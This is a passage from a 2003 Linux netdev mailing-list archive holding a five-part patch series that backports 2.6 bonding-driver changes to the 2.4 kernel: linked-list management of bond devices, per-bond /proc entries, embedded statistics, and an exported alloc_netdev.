(PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7bFl016561 for ; Wed, 30 Jul 2003 10:07:37 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH6Bh08316 for ; Wed, 30 Jul 2003 17:06:12 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH65i18020 for ; Wed, 30 Jul 2003 17:06:05 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010121710772 ; Wed, 30 Jul 2003 10:12:19 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 5/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:27 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.27122.amir.noam@intel.com> X-archive-position: 4386 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Backported from 2.6: Use a linked list to handle numerous bond devices instead of a static array. Also, fix handling of errors in bonding_init(): gracefully unregister and deallocate all previously created bond devices. Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:10 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:11 2003 @@ -515,9 +515,7 @@ static struct bond_parm_tbl bond_lacp_tb { NULL, -1}, }; -static int first_pass = 1; -static struct bonding *these_bonds = NULL; -static struct net_device *dev_bonds = NULL; +static LIST_HEAD(bond_dev_list); MODULE_PARM(max_bonds, "i"); MODULE_PARM_DESC(max_bonds, "Max number of bonded devices"); @@ -3495,47 +3493,13 @@ static int bond_read_proc(char *buf, cha static int bond_event(struct notifier_block *this, unsigned long event, void *ptr) { - struct bonding *this_bond = (struct bonding *)these_bonds; - struct bonding *last_bond; struct net_device *event_dev = (struct net_device *)ptr; + struct net_device *master = event_dev->master; - /* while there are bonds configured */ - while (this_bond != NULL) { - if (this_bond == event_dev->priv ) { - switch (event) { - case NETDEV_UNREGISTER: - /* - * remove this bond from a linked list of - * bonds - */ - if (this_bond == these_bonds) { - these_bonds = this_bond->next_bond; - } else { - for (last_bond = these_bonds; - last_bond != NULL; - last_bond = last_bond->next_bond) { - if (last_bond->next_bond == - this_bond) { - last_bond->next_bond = - this_bond->next_bond; - } - } - } - return NOTIFY_DONE; - - default: - return NOTIFY_DONE; - } - } else if (this_bond->device == event_dev->master) { - switch (event) { - case NETDEV_UNREGISTER: - bond_release(this_bond->device, event_dev); - break; - } - return NOTIFY_DONE; - } - this_bond = this_bond->next_bond; + if ((event == NETDEV_UNREGISTER) && (master != NULL)) { + bond_release(master, event_dev); } + return NOTIFY_DONE; } @@ -3543,19 +3507,40 @@ static struct notifier_block bond_netdev notifier_call: bond_event, }; +static void bond_deinit(struct net_device *dev) +{ + struct bonding *bond = dev->priv; + + list_del(&bond->bond_list); + +#ifdef CONFIG_PROC_FS + remove_proc_entry("info", bond->bond_proc_dir); + remove_proc_entry(dev->name, proc_net); +#endif +} + +static void bond_free_all(void) +{ + struct bonding *bond, *nxt; + + list_for_each_entry_safe(bond, nxt, &bond_dev_list, bond_list) { + struct net_device *dev = bond->device; + + bond_deinit(dev); + unregister_netdev(dev); + kfree(dev); + } +} + static int __init bond_init(struct net_device *dev) { - bonding_t *bond, *this_bond, *last_bond; + struct bonding *bond; int count; #ifdef BONDING_DEBUG printk (KERN_INFO "Begin bond_init for %s\n", dev->name); #endif - bond = kmalloc(sizeof(struct bonding), GFP_KERNEL); - if (bond == NULL) { - return -ENOMEM; - } - memset(bond, 0, sizeof(struct bonding)); + bond = dev->priv; /* initialize rwlocks */ rwlock_init(&bond->lock); @@ -3565,7 +3550,6 @@ static int __init bond_init(struct net_d bond->current_slave = NULL; bond->current_arp_slave = NULL; bond->device = dev; - dev->priv = bond; /* Initialize the device structure. */ switch (bond_mode) { @@ -3590,7 +3574,6 @@ static int __init bond_init(struct net_d break; default: printk(KERN_ERR "Unknown bonding mode %d\n", bond_mode); - kfree(bond); return -EINVAL; } @@ -3599,14 +3582,6 @@ static int __init bond_init(struct net_d dev->stop = bond_close; dev->set_multicast_list = set_multicast_list; dev->do_ioctl = bond_ioctl; - - /* - * Fill in the fields of the device structure with ethernet-generic - * values. - */ - - ether_setup(dev); - dev->set_mac_address = bond_set_mac_address; dev->tx_queue_len = 0; dev->flags |= IFF_MASTER|IFF_MULTICAST; @@ -3640,7 +3615,6 @@ static int __init bond_init(struct net_d if (bond->bond_proc_dir == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/\n", dev->name, dev->name); - kfree(bond); return -ENOMEM; } bond->bond_proc_dir->owner = THIS_MODULE; @@ -3652,25 +3626,12 @@ static int __init bond_init(struct net_d printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); remove_proc_entry(dev->name, proc_net); - kfree(bond); return -ENOMEM; } bond->bond_proc_info_file->owner = THIS_MODULE; #endif /* CONFIG_PROC_FS */ - if (first_pass == 1) { - these_bonds = bond; - register_netdevice_notifier(&bond_netdev_notifier); - first_pass = 0; - } else { - last_bond = these_bonds; - this_bond = these_bonds->next_bond; - while (this_bond != NULL) { - last_bond = this_bond; - this_bond = this_bond->next_bond; - } - last_bond->next_bond = bond; - } + list_add_tail(&bond->bond_list, &bond_dev_list); return 0; } @@ -3710,9 +3671,6 @@ static int __init bonding_init(void) int no; int err; - /* Find a name for this unit */ - static struct net_device *dev_bond = NULL; - printk(KERN_INFO "%s", version); /* @@ -3763,12 +3721,6 @@ static int __init bonding_init(void) max_bonds, 1, INT_MAX, BOND_DEFAULT_MAX_BONDS); max_bonds = BOND_DEFAULT_MAX_BONDS; } - dev_bond = dev_bonds = kmalloc(max_bonds*sizeof(struct net_device), - GFP_KERNEL); - if (dev_bond == NULL) { - return -ENOMEM; - } - memset(dev_bonds, 0, max_bonds*sizeof(struct net_device)); if (miimon < 0) { printk(KERN_WARNING @@ -3959,47 +3911,62 @@ static int __init bonding_init(void) primary = NULL; } + rtnl_lock(); + err = 0; for (no = 0; no < max_bonds; no++) { - dev_bond->init = bond_init; - - err = dev_alloc_name(dev_bond,"bond%d"); + struct net_device *dev; + + dev = alloc_netdev(sizeof(struct bonding), "", ether_setup); + if (!dev) { + err = -ENOMEM; + goto out_err; + } + + err = dev_alloc_name(dev, "bond%d"); + if (err < 0) { + kfree(dev); + goto out_err; + } + + /* bond_init() must be called after alloc_net_dev() (for the + * /proc files), but before register_netdevice(), because we + * need to set function pointers. + */ + err = bond_init(dev); + if (err < 0) { + kfree(dev); + goto out_err; + } + + SET_MODULE_OWNER(dev); + + err = register_netdevice(dev); if (err < 0) { - kfree(dev_bonds); - return err; + bond_deinit(dev); + kfree(dev); + goto out_err; } - SET_MODULE_OWNER(dev_bond); - if (register_netdev(dev_bond) != 0) { - kfree(dev_bonds); - return -EIO; - } - dev_bond++; } + + rtnl_unlock(); + register_netdevice_notifier(&bond_netdev_notifier); + return 0; + +out_err: + rtnl_unlock(); + + /* free and unregister all bonds that were successfully added */ + bond_free_all(); + + return err; } static void __exit bonding_exit(void) { - struct net_device *dev_bond = dev_bonds; - struct bonding *bond; - int no; - unregister_netdevice_notifier(&bond_netdev_notifier); - - for (no = 0; no < max_bonds; no++) { - -#ifdef CONFIG_PROC_FS - bond = (struct bonding *) dev_bond->priv; - remove_proc_entry("info", bond->bond_proc_dir); - remove_proc_entry(dev_bond->name, proc_net); -#endif - unregister_netdev(dev_bond); - kfree(dev_bond->priv); - - dev_bond->priv = NULL; - dev_bond++; - } - kfree(dev_bonds); + bond_free_all(); } module_init(bonding_init); diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bonding.h linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h --- linux-2.4.22-pre9/drivers/net/bonding/bonding.h Wed Jul 30 19:14:10 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h Wed Jul 30 19:14:11 2003 @@ -104,7 +104,7 @@ typedef struct bonding { struct proc_dir_entry *bond_proc_dir; struct proc_dir_entry *bond_proc_info_file; #endif /* CONFIG_PROC_FS */ - struct bonding *next_bond; + struct list_head bond_list; struct net_device *device; struct dev_mc_list *mc_list; unsigned short flags; From amir.noam@intel.com Wed Jul 30 10:07:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:14 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7AFl016328 for ; Wed, 30 Jul 2003 10:07:11 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH5jh07891 for ; Wed, 30 Jul 2003 17:05:45 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5di17555 for ; Wed, 30 Jul 2003 17:05:39 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010115127255 ; Wed, 30 Jul 2003 10:11:52 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 1/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:00 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.00926.amir.noam@intel.com> X-archive-position: 4382 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Add list_for_each_entry_safe() Amir diff -Nuarp linux-2.4.22-pre9/include/linux/list.h linux-2.4.22-pre9-devel/include/linux/list.h --- linux-2.4.22-pre9/include/linux/list.h Wed Jul 30 19:14:01 2003 +++ linux-2.4.22-pre9-devel/include/linux/list.h Wed Jul 30 19:14:02 2003 @@ -227,6 +227,19 @@ static inline void list_splice_init(stru pos = list_entry(pos->member.next, typeof(*pos), member), \ prefetch(pos->member.next)) +/** + * list_for_each_entry_safe - iterate over list of given type safe against removal of list entry + * @pos: the type * to use as a loop counter. + * @n: another type * to use as temporary storage + * @head: the head for your list. + * @member: the name of the list_struct within the struct. + */ +#define list_for_each_entry_safe(pos, n, head, member) \ + for (pos = list_entry((head)->next, typeof(*pos), member), \ + n = list_entry(pos->member.next, typeof(*pos), member); \ + &pos->member != (head); \ + pos = n, n = list_entry(n->member.next, typeof(*n), member)) + #endif /* __KERNEL__ || _LVM_H_INCLUDE */ #endif From amir.noam@intel.com Wed Jul 30 10:07:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:21 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7IFl016362 for ; Wed, 30 Jul 2003 10:07:19 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2ot24580 for ; Wed, 30 Jul 2003 17:02:50 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5li17709 for ; Wed, 30 Jul 2003 17:05:47 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010120008806 ; Wed, 30 Jul 2003 10:12:01 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 2/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:09 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.09735.amir.noam@intel.com> X-archive-position: 4383 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Export alloc_netdev() Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/net_init.c linux-2.4.22-pre9-devel/drivers/net/net_init.c --- linux-2.4.22-pre9/drivers/net/net_init.c Wed Jul 30 19:14:03 2003 +++ linux-2.4.22-pre9-devel/drivers/net/net_init.c Wed Jul 30 19:14:04 2003 @@ -71,7 +71,7 @@ */ -static struct net_device *alloc_netdev(int sizeof_priv, const char *mask, +struct net_device *alloc_netdev(int sizeof_priv, const char *mask, void (*setup)(struct net_device *)) { struct net_device *dev; @@ -97,6 +97,7 @@ static struct net_device *alloc_netdev(i return dev; } +EXPORT_SYMBOL(alloc_netdev); static struct net_device *init_alloc_dev(int sizeof_priv) { diff -Nuarp linux-2.4.22-pre9/include/linux/netdevice.h linux-2.4.22-pre9-devel/include/linux/netdevice.h --- linux-2.4.22-pre9/include/linux/netdevice.h Wed Jul 30 19:14:03 2003 +++ linux-2.4.22-pre9-devel/include/linux/netdevice.h Wed Jul 30 19:14:04 2003 @@ -801,6 +801,8 @@ extern void tr_setup(struct net_device extern void fc_setup(struct net_device *dev); extern void fc_freedev(struct net_device *dev); /* Support for loadable net-drivers */ +extern struct net_device *alloc_netdev(int sizeof_priv, const char *name, + void (*setup)(struct net_device *)); extern int register_netdev(struct net_device *dev); extern void unregister_netdev(struct net_device *dev); /* Functions used for multicast support */ From amir.noam@intel.com Wed Jul 30 10:07:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:29 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7OFl016435 for ; Wed, 30 Jul 2003 10:07:24 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2ut24670 for ; Wed, 30 Jul 2003 17:02:56 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5ri17804 for ; Wed, 30 Jul 2003 17:05:53 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010120523842 ; Wed, 30 Jul 2003 10:12:06 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 3/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:14 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.14989.amir.noam@intel.com> X-archive-position: 4384 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Each /proc/net/bondX/info file used to print the data of all the bond devices. Use a proc read entry instead of a get info entry so we can pass the relevant bond device as an argument. Patch is looks messier than it really is since the entire function has one less indentation level now. Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:06 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:07 2003 @@ -564,14 +564,6 @@ static int bond_release(struct net_devic static int bond_release_all(struct net_device *master); static int bond_sethwaddr(struct net_device *master, struct net_device *slave); -/* - * bond_get_info is the interface into the /proc filesystem. This is - * a different interface than the BOND_INFO_QUERY ioctl. That is done - * through the generic networking ioctl interface, and bond_info_query - * is the internal function which provides that information. - */ -static int bond_get_info(char *buf, char **start, off_t offset, int length); - /* Caller must hold bond->ptrlock for write */ static inline struct slave* bond_assign_current_slave(struct bonding *bond,struct slave *newslave) @@ -3369,131 +3361,136 @@ static struct net_device_stats *bond_get return stats; } -static int bond_get_info(char *buf, char **start, off_t offset, int length) +#ifdef CONFIG_PROC_FS +static int bond_read_proc(char *buf, char **start, off_t off, int count, int *eof, void *data) { - bonding_t *bond = these_bonds; + struct bonding *bond = (struct bonding *) data; int len = 0; - off_t begin = 0; u16 link; slave_t *slave = NULL; + /* make sure the bond won't be taken away */ + read_lock(&dev_base_lock); + len += sprintf(buf + len, "%s\n", version); - while (bond != NULL) { - /* - * This function locks the mutex, so we can't lock it until - * afterwards - */ - link = bond_check_mii_link(bond); + /* + * This function locks the mutex, so we can't lock it until + * afterwards + */ + link = bond_check_mii_link(bond); - len += sprintf(buf + len, "Bonding Mode: %s\n", - bond_mode_name()); + len += sprintf(buf + len, "Bonding Mode: %s\n", + bond_mode_name()); - if ((bond_mode == BOND_MODE_ACTIVEBACKUP) || - (bond_mode == BOND_MODE_TLB) || - (bond_mode == BOND_MODE_ALB)) { - read_lock_bh(&bond->lock); - read_lock(&bond->ptrlock); - if (bond->current_slave != NULL) { - len += sprintf(buf + len, - "Currently Active Slave: %s\n", - bond->current_slave->dev->name); - } - read_unlock(&bond->ptrlock); - read_unlock_bh(&bond->lock); + if ((bond_mode == BOND_MODE_ACTIVEBACKUP) || + (bond_mode == BOND_MODE_TLB) || + (bond_mode == BOND_MODE_ALB)) { + read_lock_bh(&bond->lock); + read_lock(&bond->ptrlock); + if (bond->current_slave != NULL) { + len += sprintf(buf + len, + "Currently Active Slave: %s\n", + bond->current_slave->dev->name); } + read_unlock(&bond->ptrlock); + read_unlock_bh(&bond->lock); + } - len += sprintf(buf + len, "MII Status: "); - len += sprintf(buf + len, - link == BMSR_LSTATUS ? "up\n" : "down\n"); - len += sprintf(buf + len, "MII Polling Interval (ms): %d\n", - miimon); - len += sprintf(buf + len, "Up Delay (ms): %d\n", - updelay * miimon); - len += sprintf(buf + len, "Down Delay (ms): %d\n", - downdelay * miimon); - len += sprintf(buf + len, "Multicast Mode: %s\n", - multicast_mode_name()); + len += sprintf(buf + len, "MII Status: "); + len += sprintf(buf + len, + link == BMSR_LSTATUS ? "up\n" : "down\n"); + len += sprintf(buf + len, "MII Polling Interval (ms): %d\n", + miimon); + len += sprintf(buf + len, "Up Delay (ms): %d\n", + updelay * miimon); + len += sprintf(buf + len, "Down Delay (ms): %d\n", + downdelay * miimon); + len += sprintf(buf + len, "Multicast Mode: %s\n", + multicast_mode_name()); - read_lock_bh(&bond->lock); + read_lock_bh(&bond->lock); - if (bond_mode == BOND_MODE_8023AD) { - struct ad_info ad_info; + if (bond_mode == BOND_MODE_8023AD) { + struct ad_info ad_info; - len += sprintf(buf + len, "\n802.3ad info\n"); + len += sprintf(buf + len, "\n802.3ad info\n"); - if (bond_3ad_get_active_agg_info(bond, &ad_info)) { - len += sprintf(buf + len, "bond %s has no active aggregator\n", bond->device->name); - } else { - len += sprintf(buf + len, "Active Aggregator Info:\n"); + if (bond_3ad_get_active_agg_info(bond, &ad_info)) { + len += sprintf(buf + len, "bond %s has no active aggregator\n", bond->device->name); + } else { + len += sprintf(buf + len, "Active Aggregator Info:\n"); - len += sprintf(buf + len, "\tAggregator ID: %d\n", ad_info.aggregator_id); - len += sprintf(buf + len, "\tNumber of ports: %d\n", ad_info.ports); - len += sprintf(buf + len, "\tActor Key: %d\n", ad_info.actor_key); - len += sprintf(buf + len, "\tPartner Key: %d\n", ad_info.partner_key); - len += sprintf(buf + len, "\tPartner Mac Address: %02x:%02x:%02x:%02x:%02x:%02x\n", - ad_info.partner_system[0], - ad_info.partner_system[1], - ad_info.partner_system[2], - ad_info.partner_system[3], - ad_info.partner_system[4], - ad_info.partner_system[5]); - } + len += sprintf(buf + len, "\tAggregator ID: %d\n", ad_info.aggregator_id); + len += sprintf(buf + len, "\tNumber of ports: %d\n", ad_info.ports); + len += sprintf(buf + len, "\tActor Key: %d\n", ad_info.actor_key); + len += sprintf(buf + len, "\tPartner Key: %d\n", ad_info.partner_key); + len += sprintf(buf + len, "\tPartner Mac Address: %02x:%02x:%02x:%02x:%02x:%02x\n", + ad_info.partner_system[0], + ad_info.partner_system[1], + ad_info.partner_system[2], + ad_info.partner_system[3], + ad_info.partner_system[4], + ad_info.partner_system[5]); } + } - for (slave = bond->prev; slave != (slave_t *)bond; - slave = slave->prev) { - len += sprintf(buf + len, "\nSlave Interface: %s\n", slave->dev->name); - - len += sprintf(buf + len, "MII Status: "); - - len += sprintf(buf + len, - slave->link == BOND_LINK_UP ? - "up\n" : "down\n"); - len += sprintf(buf + len, "Link Failure Count: %d\n", - slave->link_failure_count); - - if (app_abi_ver >= 1) { - len += sprintf(buf + len, - "Permanent HW addr: %02x:%02x:%02x:%02x:%02x:%02x\n", - slave->perm_hwaddr[0], - slave->perm_hwaddr[1], - slave->perm_hwaddr[2], - slave->perm_hwaddr[3], - slave->perm_hwaddr[4], - slave->perm_hwaddr[5]); - } + for (slave = bond->prev; slave != (slave_t *)bond; + slave = slave->prev) { + len += sprintf(buf + len, "\nSlave Interface: %s\n", slave->dev->name); - if (bond_mode == BOND_MODE_8023AD) { - struct aggregator *agg = SLAVE_AD_INFO(slave).port.aggregator; + len += sprintf(buf + len, "MII Status: "); - if (agg) { - len += sprintf(buf + len, "Aggregator ID: %d\n", - agg->aggregator_identifier); - } else { - len += sprintf(buf + len, "Aggregator ID: N/A\n"); - } - } - } - read_unlock_bh(&bond->lock); + len += sprintf(buf + len, + slave->link == BOND_LINK_UP ? + "up\n" : "down\n"); + len += sprintf(buf + len, "Link Failure Count: %d\n", + slave->link_failure_count); - /* - * Figure out the calcs for the /proc/net interface - */ - *start = buf + (offset - begin); - len -= (offset - begin); - if (len > length) { - len = length; - } - if (len < 0) { - len = 0; + if (app_abi_ver >= 1) { + len += sprintf(buf + len, + "Permanent HW addr: %02x:%02x:%02x:%02x:%02x:%02x\n", + slave->perm_hwaddr[0], + slave->perm_hwaddr[1], + slave->perm_hwaddr[2], + slave->perm_hwaddr[3], + slave->perm_hwaddr[4], + slave->perm_hwaddr[5]); } + if (bond_mode == BOND_MODE_8023AD) { + struct aggregator *agg = SLAVE_AD_INFO(slave).port.aggregator; - bond = bond->next_bond; + if (agg) { + len += sprintf(buf + len, "Aggregator ID: %d\n", + agg->aggregator_identifier); + } else { + len += sprintf(buf + len, "Aggregator ID: N/A\n"); + } + } } + read_unlock_bh(&bond->lock); + + /* + * Figure out the calcs for the /proc/net interface + */ + if (len <= off + count) { + *eof = 1; + } + *start = buf + off; + len -= off; + if (len > count) { + len = count; + } + if (len < 0) { + len = 0; + } + + read_unlock(&dev_base_lock); + return len; } +#endif /* CONFIG_PROC_FS */ static int bond_event(struct notifier_block *this, unsigned long event, void *ptr) @@ -3655,9 +3652,11 @@ static int __init bond_init(struct net_d kfree(bond); return -ENOMEM; } + bond->bond_proc_dir->owner = THIS_MODULE; + bond->bond_proc_info_file = - create_proc_info_entry("info", 0, bond->bond_proc_dir, - bond_get_info); + create_proc_read_entry("info", 0, bond->bond_proc_dir, + bond_read_proc, bond); if (bond->bond_proc_info_file == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); @@ -3666,6 +3665,7 @@ static int __init bond_init(struct net_d kfree(bond); return -ENOMEM; } + bond->bond_proc_info_file->owner = THIS_MODULE; #endif /* CONFIG_PROC_FS */ if (first_pass == 1) { From amir.noam@intel.com Wed Jul 30 10:07:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:34 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7UFl016495 for ; Wed, 30 Jul 2003 10:07:30 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH32t24747 for ; Wed, 30 Jul 2003 17:03:02 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5xi17895 for ; Wed, 30 Jul 2003 17:05:59 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010121124464 ; Wed, 30 Jul 2003 10:12:12 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 4/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:21 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.21369.amir.noam@intel.com> X-archive-position: 4385 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Backported from 2.6: Don't dynamically allocate a net_device_stats structure for each bond, instead allocate it with the bonding structure. Since they are always allocated together anyway, we might as well put the stats struct within the bond. Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:08 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:09 2003 @@ -3319,10 +3319,10 @@ static int bond_xmit_activebackup(struct static struct net_device_stats *bond_get_stats(struct net_device *dev) { bonding_t *bond = dev->priv; - struct net_device_stats *stats = bond->stats, *sstats; + struct net_device_stats *stats = &(bond->stats), *sstats; slave_t *slave; - memset(bond->stats, 0, sizeof(struct net_device_stats)); + memset(stats, 0, sizeof(struct net_device_stats)); read_lock_bh(&bond->lock); @@ -3560,13 +3560,6 @@ static int __init bond_init(struct net_d /* initialize rwlocks */ rwlock_init(&bond->lock); rwlock_init(&bond->ptrlock); - - bond->stats = kmalloc(sizeof(struct net_device_stats), GFP_KERNEL); - if (bond->stats == NULL) { - kfree(bond); - return -ENOMEM; - } - memset(bond->stats, 0, sizeof(struct net_device_stats)); bond->next = bond->prev = (slave_t *)bond; bond->current_slave = NULL; @@ -3597,7 +3590,6 @@ static int __init bond_init(struct net_d break; default: printk(KERN_ERR "Unknown bonding mode %d\n", bond_mode); - kfree(bond->stats); kfree(bond); return -EINVAL; } @@ -3648,7 +3640,6 @@ static int __init bond_init(struct net_d if (bond->bond_proc_dir == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/\n", dev->name, dev->name); - kfree(bond->stats); kfree(bond); return -ENOMEM; } @@ -3661,7 +3652,6 @@ static int __init bond_init(struct net_d printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); remove_proc_entry(dev->name, proc_net); - kfree(bond->stats); kfree(bond); return -ENOMEM; } @@ -4004,9 +3994,8 @@ static void __exit bonding_exit(void) remove_proc_entry(dev_bond->name, proc_net); #endif unregister_netdev(dev_bond); - kfree(bond->stats); kfree(dev_bond->priv); - + dev_bond->priv = NULL; dev_bond++; } diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bonding.h linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h --- linux-2.4.22-pre9/drivers/net/bonding/bonding.h Wed Jul 30 19:14:08 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h Wed Jul 30 19:14:09 2003 @@ -99,7 +99,7 @@ typedef struct bonding { rwlock_t ptrlock; struct timer_list mii_timer; struct timer_list 